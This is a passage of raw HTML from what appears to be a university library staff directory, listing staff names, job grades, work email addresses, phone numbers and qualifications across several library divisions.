https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2856-crop-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2856-crop-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2856-crop-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-ff798bf elementor-widget elementor-widget-heading" data-id="ff798bf" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">NAQIUDDIN ABDUL HARIS</h3> </div> </div> <div class="elementor-element elementor-element-8a7fc26 elementor-widget elementor-widget-heading" data-id="8a7fc26" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Librarian (S41)</div> </div> </div> <div class="elementor-element elementor-element-5efaf05 elementor-widget elementor-widget-text-editor" data-id="5efaf05" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>naqiuddin@ukm.edu.my<br />03-89215126<br />B.Sc. (Hons) Information Library Management (UiTM)</p> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-cf556fd elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="cf556fd" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-c52b304" data-id="c52b304" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-59842aa elementor-widget elementor-widget-heading" data-id="59842aa" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">USER EDUCATION</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-0479046 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="0479046" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-25832f7" data-id="25832f7" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-d1e58a2 elementor-widget elementor-widget-image" data-id="d1e58a2" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1515-200x300.jpg" class="attachment-medium size-medium wp-image-1174" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1515-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1515-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1515-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1515-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1515-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1515-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-c0d4626 elementor-widget elementor-widget-heading" data-id="c0d4626" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Norliah Sukarno</h3> </div> </div> <div class="elementor-element elementor-element-dbed8f9 elementor-widget elementor-widget-heading" data-id="dbed8f9" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head Division (Assistant Chief Librarian) (S48)</div> </div> </div> <div class="elementor-element elementor-element-3181d65 elementor-widget elementor-widget-text-editor" data-id="3181d65" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>norli@ukm.edu.my<br />03-89214732<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-5633b72" data-id="5633b72" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-f176662 elementor-widget elementor-widget-image" data-id="f176662" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1486-200x300.jpg" class="attachment-medium size-medium wp-image-1151" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1486-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1486-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1486-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1486-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1486-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1486-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-1fe6097 elementor-widget elementor-widget-heading" data-id="1fe6097" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Rosmarlidaini Mah Hassan</h3> </div> </div> <div class="elementor-element elementor-element-28d9ef8 elementor-widget elementor-widget-heading" data-id="28d9ef8" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default"><span style=", sans-serif;font-size: 15.4px;font-style: normal;font-weight: 300">Assistant Chief Librarian</span> (S48)</div> </div> </div> <div class="elementor-element elementor-element-416426e elementor-widget elementor-widget-text-editor" data-id="416426e" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <h6><span style="font-weight: normal;">rosmarlidaini@ukm.edu.my<br>03-892158181<br>MLS (UiTM)<br>B.Sc. (Hons) Information Studies (UiTM)</span></h6> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-f84d478" data-id="f84d478" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-f3e0464 elementor-widget elementor-widget-image" data-id="f3e0464" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1724-200x300.jpg" class="attachment-medium size-medium wp-image-1194" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1724-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1724-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1724-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1724-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1724-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1724-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-560556b elementor-widget elementor-widget-heading" data-id="560556b" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Athirah Omar</h3> </div> </div> <div class="elementor-element elementor-element-72760ba elementor-widget elementor-widget-heading" data-id="72760ba" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Senior Librarian (S44)</div> </div> </div> <div class="elementor-element elementor-element-ba33593 elementor-widget elementor-widget-text-editor" data-id="ba33593" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>athirah@ukm.edu.my<br />03-89215575<br />M.Sc. Info. Management (UiTM)<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-231456d elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="231456d" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-8e2422c" data-id="8e2422c" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-079963b" data-id="079963b" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-e9f1f92 elementor-widget elementor-widget-image" data-id="e9f1f92" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1838-1-200x300.jpg" class="attachment-medium size-medium wp-image-1228" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1838-1-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1838-1-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1838-1-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1838-1-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1838-1-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1838-1-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-d8d99a6 elementor-widget elementor-widget-heading" data-id="d8d99a6" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Mazarita Sidek </h3> </div> </div> <div class="elementor-element elementor-element-1040464 elementor-widget elementor-widget-heading" data-id="1040464" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Assistant Librarian (S32)</div> </div> </div> <div class="elementor-element elementor-element-5ee5a32 elementor-widget elementor-widget-text-editor" data-id="5ee5a32" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>maza@ukm.edu.my<br />03-89214428</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-22cef0d" data-id="22cef0d" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-80de349 elementor-widget elementor-widget-image" data-id="80de349" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="203" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2023/03/ain-203x300.jpg" class="attachment-medium size-medium wp-image-12871" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2023/03/ain-203x300.jpg 203w, https://www.ukm.my/ptsl/wp-content/uploads/2023/03/ain.jpg 393w" sizes="(max-width: 203px) 100vw, 203px" /> </div> </div> <div class="elementor-element elementor-element-8d6bb85 elementor-widget elementor-widget-heading" data-id="8d6bb85" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Nurul Ain Afiqah Binti Zaidi</h3> </div> </div> <div class="elementor-element elementor-element-a31f455 elementor-widget elementor-widget-heading" data-id="a31f455" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Office Secretary (N29) </div> </div> </div> <div class="elementor-element elementor-element-7dd664a elementor-widget elementor-widget-text-editor" data-id="7dd664a" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span class="il">ainzaidi@ukm.edu.my<br />03-89214428</span></p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-29c3bb7" data-id="29c3bb7" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-e10b130 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="e10b130" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-ef24dc2" data-id="ef24dc2" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-3d44aa6 elementor-widget elementor-widget-heading" data-id="3d44aa6" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">ARCHIVE & SPECIAL COLLECTION</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-61489e7 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="61489e7" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-254b900" data-id="254b900" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-1fa2a8b" data-id="1fa2a8b" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-d18ca9d elementor-widget elementor-widget-image" data-id="d18ca9d" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1729-200x300.jpg" class="attachment-medium size-medium wp-image-1183" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1729-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1729-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1729-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1729-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1729-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1729-scaled.jpg 1706w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-448ceb1 elementor-widget elementor-widget-heading" data-id="448ceb1" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h4 class="elementor-heading-title elementor-size-default">Ruzita Kamis</h4> </div> </div> <div class="elementor-element elementor-element-f8e440d elementor-widget elementor-widget-heading" data-id="f8e440d" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head Division (Senior Librarian) (S44)</div> </div> </div> <div class="elementor-element elementor-element-2502093 elementor-widget elementor-widget-text-editor" data-id="2502093" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>ruzita_kamis@ukm.edu.my<br />03-89215854<br />MLIS (UM)<br />B.A (Hons) Islamic Studies (UKM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-aba3056" data-id="aba3056" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-f737f50 elementor-widget elementor-widget-image" data-id="f737f50" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1544-200x300.jpg" class="attachment-medium size-medium wp-image-1179" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1544-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1544-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1544-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1544-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1544-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1544-scaled.jpg 1706w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-3c8b14c elementor-widget elementor-widget-heading" data-id="3c8b14c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Maslia Manshor</h3> </div> </div> <div class="elementor-element elementor-element-566d953 elementor-widget elementor-widget-heading" data-id="566d953" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Senior Librarian (S44)</div> </div> </div> <div class="elementor-element elementor-element-221d7a9 elementor-widget elementor-widget-text-editor" data-id="221d7a9" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>maslia@ukm.edu.my<br />03-89214668<br />MLIS (IIUM)<br />B.A (Hons) Islamic Revealed Knowledge & Human Sciences (IIUM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-abb9eea" data-id="abb9eea" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-1995458 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="1995458" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-a65ab19" data-id="a65ab19" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-5611a7d elementor-widget elementor-widget-heading" data-id="5611a7d" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">DEPARTMENT OF INFORMATION TECHNOLOGY & KNOWLEDGE INFRASTRUCTURE</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-5517b63 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="5517b63" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-f0da6aa" data-id="f0da6aa" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-0388f94 elementor-widget elementor-widget-heading" data-id="0388f94" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">ICT & MULTIMEDIA MAINTENANCE</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-2ff1cd6 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="2ff1cd6" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-426cbd9" data-id="426cbd9" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-b0a8543" data-id="b0a8543" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-5552d82 elementor-widget elementor-widget-image" data-id="5552d82" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1538-200x300.jpg" class="attachment-medium size-medium wp-image-1172" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1538-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1538-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1538-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1538-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1538-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1538-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-7c29d13 elementor-widget elementor-widget-heading" data-id="7c29d13" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Nor Hamsiah Ahmad Hosaini</h3> </div> </div> <div class="elementor-element elementor-element-52f11ef elementor-widget elementor-widget-heading" data-id="52f11ef" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default"><span>Head Division </span>(Senior Librarian) (S44)</div> </div> </div> <div class="elementor-element elementor-element-573638f elementor-widget elementor-widget-text-editor" data-id="573638f" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>norhamsiah@ukm.edu.my<br />03-89213599<br />MLIS (UM)<br /><span style="color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: small; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; text-align: start;">BSc. Information Technology (UM)</span></p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-3801108" data-id="3801108" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-5c09b8d elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="5c09b8d" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-8ebfff4" data-id="8ebfff4" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-3f1493d elementor-widget elementor-widget-heading" data-id="3f1493d" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">SYSTEM MANAGEMENT & WEB SERVICE</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-bc32f6a elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="bc32f6a" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-2203dc9" data-id="2203dc9" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-2c3dbcc" data-id="2c3dbcc" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-ca8c7a4 elementor-widget elementor-widget-image" data-id="ca8c7a4" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1798-200x300.jpg" class="attachment-medium size-medium wp-image-1184" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1798-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1798-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1798-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1798-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1798-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1798-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-f6bc602 elementor-widget elementor-widget-heading" data-id="f6bc602" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Rohalia Mohd Rohani</h3> </div> </div> <div class="elementor-element elementor-element-6d2676a elementor-widget elementor-widget-heading" data-id="6d2676a" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default"><span>Head Division </span>(Senior Librarian) (S44)</div> </div> </div> <div class="elementor-element elementor-element-4603a7b elementor-widget elementor-widget-text-editor" data-id="4603a7b" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>rohalia@ukm.edu.my<br />03-89215844<br />MLIS (UM)<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-12cce5f" data-id="12cce5f" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-8861ae8 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="8861ae8" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-ceae58e" data-id="ceae58e" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-c7062ee" data-id="c7062ee" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-bc2ae5c elementor-widget elementor-widget-image" data-id="bc2ae5c" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2024/09/DSC_5644-2-200x300.png" class="attachment-medium size-medium wp-image-17339" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2024/09/DSC_5644-2-200x300.png 200w, https://www.ukm.my/ptsl/wp-content/uploads/2024/09/DSC_5644-2-683x1024.png 683w, https://www.ukm.my/ptsl/wp-content/uploads/2024/09/DSC_5644-2.png 720w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-2fcbb0a elementor-widget elementor-widget-heading" data-id="2fcbb0a" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-medium">Muhammad Hasryiman Bin Borhan</div> </div> </div> <div class="elementor-element elementor-element-e91526f elementor-widget elementor-widget-heading" data-id="e91526f" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Librarian (S41)</div> </div> </div> <div class="elementor-element elementor-element-2664afc elementor-widget elementor-widget-text-editor" data-id="2664afc" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>hasry@ukm.edu.my<br />03-89213191</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-4e76f81" data-id="4e76f81" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-4592ed8 elementor-widget elementor-widget-image" data-id="4592ed8" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1558-200x300.jpg" class="attachment-medium size-medium wp-image-1206" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1558-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1558-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1558-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1558-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1558-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1558-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-2322285 elementor-widget elementor-widget-heading" data-id="2322285" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-medium">MUHAMAD HELMIE BIN ZAINUDIN</div> </div> </div> <div class="elementor-element elementor-element-467aa44 elementor-widget elementor-widget-heading" data-id="467aa44" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Assistant IT Officer (FA29)</div> </div> </div> <div class="elementor-element elementor-element-bae2abb elementor-widget elementor-widget-text-editor" data-id="bae2abb" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>helmie@ukm.edu.my<br />03-89215871</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-0c3cd13" data-id="0c3cd13" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-1cf78b8 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="1cf78b8" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-eccc770" data-id="eccc770" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-5406b94 elementor-widget elementor-widget-heading" data-id="5406b94" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">PRESERVATION & DIGITIZATION</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-166f22f elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="166f22f" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-107daf9" data-id="107daf9" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-6c722ed" data-id="6c722ed" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element 